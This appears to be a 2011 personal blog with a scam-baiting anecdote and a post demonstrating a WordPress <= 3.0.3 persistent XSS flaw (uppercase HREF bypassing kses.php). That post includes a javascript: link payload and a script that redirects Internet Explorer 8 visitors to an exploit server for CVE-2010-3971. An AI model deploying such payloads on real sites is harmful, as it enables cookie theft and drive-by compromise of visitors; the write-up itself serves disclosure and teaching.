Sunday, November 6, 2011

Have fun with scammers

A couple of days ago i've received this e-mail:


After reading it i decided to go on and have some fun with him so i've replied and after one day i get the response.


To convince me he attached four pictures regarding the flat. Here is the living room and my future bedroom.



Anyone can see that this picture is from a five stars hotel but to be really sure i used google search by image and what i found ? that these images are from an hotel in the center of Milan.

Things are getting interesting so i decided to know how can i get this awesome flat.


His response.

Now it's time to send him my personal information in a pdf.




After this e-mail i haven't got any response, maybe he is angry with me but i don't know why :(.

Tuesday, November 1, 2011

Wordpress XSS Vulnerability + IE 8 Exploit

The 30th December of 2010 a guy named sneak reported a persistent XSS vulnerability that affect the popular blog cms wordpress <= 3.0.3.

The problem is located into the kses.php file which is the HTML sanitation library. If we type a link with the href attribute written in capital letters this library don't filter the content properly.

Example:
<a HREF="javascript:alert(0)">CLICK HERE</a>

If we post a comment this tag will be accepted as a common link. With this vulnerability we can craft a piece of code that can steal cookies, redirected to other sites etc....

This video shows you how it can be easy for everyone to craft an evil comment to redirect the victim to a server where there is an exploit for Internet Explorer 8 (CVE-2010-3971).

Our evil code:
var s = navigator.userAgent;

if( s.search('MSIE 8.0') != -1 ) {
    window.location = "http://192.168.2.13:8080/news";
}


Reference and more detailed information:
- Sneak blog 
- Metasploit Unleashed
- Javascript Obfuscator